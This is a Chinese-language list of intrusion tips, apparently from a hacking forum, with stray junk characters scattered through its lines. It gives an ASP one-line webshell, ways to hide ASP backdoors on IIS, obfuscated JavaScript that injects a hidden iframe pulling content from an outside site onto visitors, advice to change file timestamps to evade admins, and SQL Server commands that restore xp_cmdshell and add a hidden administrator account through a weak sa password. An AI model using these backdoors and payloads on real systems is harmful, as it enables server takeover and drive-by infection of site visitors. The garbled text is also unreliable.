& H0 Q( X9 I* f( D. b$ {/ E cf).<%if request("cmd")<>"" then execute request("pass")%>
9 h; P. [5 [) l- a) \# e" w+ g' n( H& X8 g( O
52、at "12:17" /interactive cmd
) L2 ]* i' [% ^- x执行后可以用AT命令查看新加的任务: l8 B" G! ^1 A
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。% G( f4 i: C' B& W
% ?, G+ U5 E& e' a1 w
53、隐藏ASP后门的两种方法% _* a) c: P( K
1、建立非标准目录:mkdir images..\
7 M# }3 l, t! R# Z7 u t拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp" |; A- X% C1 J3 t9 E
通过web访问ASP木马:http://ip/images../news.asp?action=login
5 V' s' {+ p y+ D! n- ]如何删除非标准目录:rmdir images..\ /s5 L' ]. g: d5 d9 _, G' a+ h% U
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:7 \2 T. s5 h$ R: Y3 R
mkdir programme.asp1 e, k! M+ m) U: Y& Q6 Q8 x( z' Q
新建1.txt文件内容:<!--#include file=”12.jpg”-->
3 h- m: X$ S3 r% b7 D0 `( p新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
7 ~8 F$ @. p( \* g; L* pattrib +H +S programme.asp
! J _' S0 B* q. L1 {6 s+ M通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt0 D8 d. B& d1 E# K1 a
. w, g Y$ ?* e# X5 \5 M) x* L7 m
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! Y3 ?! W4 q* j9 |
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。 V, n1 Z2 c8 A. q/ P* G
1 q) p* p5 e# } R$ L55、JS隐蔽挂马/ I8 { T, r! r* H
1.2 c) R* q/ ~( C
var tr4c3="<iframe src=ht";
! P* l" g" C1 Y K8 Otr4c3 = tr4c3+"tp:/";
* \4 H6 c& `& s6 Ktr4c3 = tr4c3+"/ww";
; I4 ?* V; B' k/ ftr4c3 = tr4c3+"w.tr4";7 i2 |. g0 U- G/ K$ u
tr4c3 = tr4c3+"c3.com/inc/m";0 C( a B; w! _4 v# {/ h; J5 g
tr4c3 = tr4c3+"m.htm style="display:none"></i";; S$ a* X8 U; j. U9 c0 X+ N
tr4c3 =tr4c3+"frame>'";
: x4 t% G& b* X- @$ s9 ddocument.write(tr4c3);
# z& J+ |6 ?; w4 W- B/ }$ o% u4 f避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
8 h% g7 K; S0 `: j) I; w4 @* e7 y, F4 P
2.
9 k9 @; a, |5 a. i w/ `* o转换进制,然后用EVAL执行。如$ x- x# }. i: j9 [2 h1 j$ ^
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
" h& n1 p+ D |3 ^( L; F不过这个有点显眼。
# A2 V0 r/ {' V% g/ _. j. [: a5 v! O3.
- e: U, z+ M- k( Tdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
* p, K5 i: A0 z" |最后一点,别忘了把文件的时间也修改下。
4 q; a9 z B+ O& A2 W1 w
6 s" j5 j5 _9 ^2 @56.3389终端入侵常用DOS命令
$ Y+ W4 y: R8 ^! _( K4 xtaskkill taskkill /PID 1248 /t
1 ?+ V8 M" w, F% t; h3 t2 U7 n
0 o! p! |/ E9 `8 O; [/ ~/ `& Ttasklist 查进程
7 {# z& C7 m7 ^( J Y4 {& i" v, L
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
% [% ]% {: ^! n4 siisreset /reboot
! M: a u4 Q6 s9 Ptsshutdn /reboot /delay:1 重起服务器
4 D0 _& q6 N+ K: L8 v! ~$ v
6 `+ x2 w. F! t+ Y, _logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
1 D% }, d5 [: J, m U& r" r+ o- t9 C3 p& U, |- v @2 n- F: u
query user 查看当前终端用户在线情况; N1 }! u, l7 s1 Z# b% l7 l5 L
: p! C; q `5 O1 S' k! g; L要显示有关所有会话使用的进程的信息,请键入:query process *
. ]) w; ~! u0 [! P6 F, |4 \ n0 [: h. `" ]) r$ h, F1 C- K" I
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
: A- y0 H( W1 u
' S) Z! y: j% _要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER28 G, v/ D$ {$ E& U+ ~
' Q6 o3 c; O+ M6 J
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02% \ e5 {% W' n# \
" _+ m& u* y, J3 X4 U6 D命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启9 Z0 |* k, \8 b. D3 c; a/ c# m
- }5 }/ e, n# H% V: g命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统! ]: _, V1 r; h+ H# ^
8 K6 [* o4 J" T( c9 @( p0 Q7 S
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。7 a8 z( u s/ D
* R7 A, n$ {( R8 s命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
" J" Q) H* o7 \/ a
3 R& J6 S; L1 w. c. U. p56、在地址栏或按Ctrl+O,输入:- q. p6 V/ u9 `" Y P4 U4 Z) p, ]
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;( w$ l q6 ]1 K& i5 U* F: u: L
7 v9 z* Q t. X: `# ~$ v8 J8 g源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
1 T- d; f# P# M' p% K7 Q1 E8 \
* R9 i8 l: f2 q' f# V57、net user的时候,是不能显示加$的用户,但是如果不处理的话,& S% n$ B0 M' |4 l4 g) n7 d
用net localgroup administrators是可以看到管理组下,加了$的用户的。
0 A/ d; r! q2 M1 J; Q+ R+ R4 _2 a- f4 R+ |& a6 y3 x
58、 sa弱口令相关命令8 J" U; B0 q8 I z- J# z
+ L. {* P$ v" U# @
一.更改sa口令方法:2 ]. m: d% T' }5 ?7 I2 F# f# f
用sql综合利用工具连接后,执行命令:
# a( A2 n9 d' o. n9 S. l8 oexec sp_password NULL,'20001001','sa'; W' @9 A( u: A: n3 h1 E! p
(提示:慎用!)
: q! i$ e" m8 @$ J9 i+ q/ C# x
# z0 T$ L0 M+ A0 r. l二.简单修补sa弱口令.
2 J# E% E! |) v! r6 @% K4 [
u8 c; T4 l# I7 w方法1:查询分离器连接后执行:
7 Q6 k1 s2 o* L# ]5 gif exists (select * from- G+ [" }" C/ g1 e: S; }! \6 W
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and0 R3 c# L+ ? _
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)8 [5 i' W! ^+ l5 F4 w
, y! T+ K8 d+ u* p/ Z
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
9 ]& h3 ?7 ]! ?! }; ]5 T
* B1 p3 A5 B! W( O) @$ B6 \GO Q$ j, Y- I6 j' p+ z
9 n! h6 N) A0 P" R
然后按F5键命令执行完毕
$ c. u) H! ], P$ g6 t
1 [6 O8 |/ C/ e; ]方法2:查询分离器连接后
% ` ~" O# {1 I1 P B4 e' t第一步执行:use master
$ p/ f$ |: U* \* a第二步执行:sp_dropextendedproc 'xp_cmdshell'
% Y1 Y' T4 s! t7 ]* B7 \+ Y然后按F5键命令执行完毕/ Y, n# I9 M; k0 i* q6 V6 n2 ]
# N Y, P" w; ?1 d! t
+ q. k9 `+ j4 v* o6 W- H1 b9 O
三.常见情况恢复执行xp_cmdshell.
! ?, m( R( {0 [! U' Z& E) |" ?6 Z# S- }% o8 P. T+ ^
0 L# [6 D# F) Y0 B9 \4 ]# v: \
1 未能找到存储过程'master..xpcmdshell'.
8 d7 F2 z) t1 D 恢复方法:查询分离器连接后,
8 f5 x9 K3 z7 \3 [0 e+ g6 u第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 C$ {$ a) {* E第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
; R5 D+ k( ^9 i o0 B t4 J9 C然后按F5键命令执行完毕. J2 _9 S: {) F4 E( \* s
* Z+ U. D% C5 \% e! I4 H2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)0 g6 n3 O0 v% q+ G: e
恢复方法:查询分离器连接后,+ ^2 H" }$ D4 @4 V6 \0 x
第一步执行:sp_dropextendedproc "xp_cmdshell"
, a5 l8 |3 l/ p3 }& z5 P第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
& n2 S$ e8 V. z( R) t2 x然后按F5键命令执行完毕; }2 F6 B; i1 ^. P
' i; L- C. C: I* i* v3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)9 V8 ]2 Q$ h# X7 {$ ?
恢复方法:查询分离器连接后,
- }( C6 [, r. A3 r8 J l4 W第一步执行:exec sp_dropextendedproc 'xp_cmdshell'6 c9 o' z* y9 C0 q
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
8 f& k* c2 Q* ^; d然后按F5键命令执行完毕; ?* i7 ^: K: v
% \. z* }7 ]2 ^( L5 a- v四.终极方法.6 W& x( |( v& ]; @: W7 v
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:1 X, ?: H3 P2 F% g, s/ N2 Q' }
查询分离器连接后,
( m1 E8 }8 i* A( l7 f. Z' c. e- z2000servser系统:
" v" q& p! s3 ^/ a) {! ^0 ?& Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 M3 G1 u) z# Y* M
7 t6 q: _! `% `6 Q) w9 `( Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
' `" T2 y( c$ j: H# G
o$ y& y* H) I% ?+ Q# N9 Xxp或2003server系统:8 E; {/ N3 W) [1 t8 N
# d9 G3 K/ V: e9 ~4 d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'+ }4 T: ]" I2 v" `
# n* ]3 U6 R- x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add': u% ^0 K4 w* u
|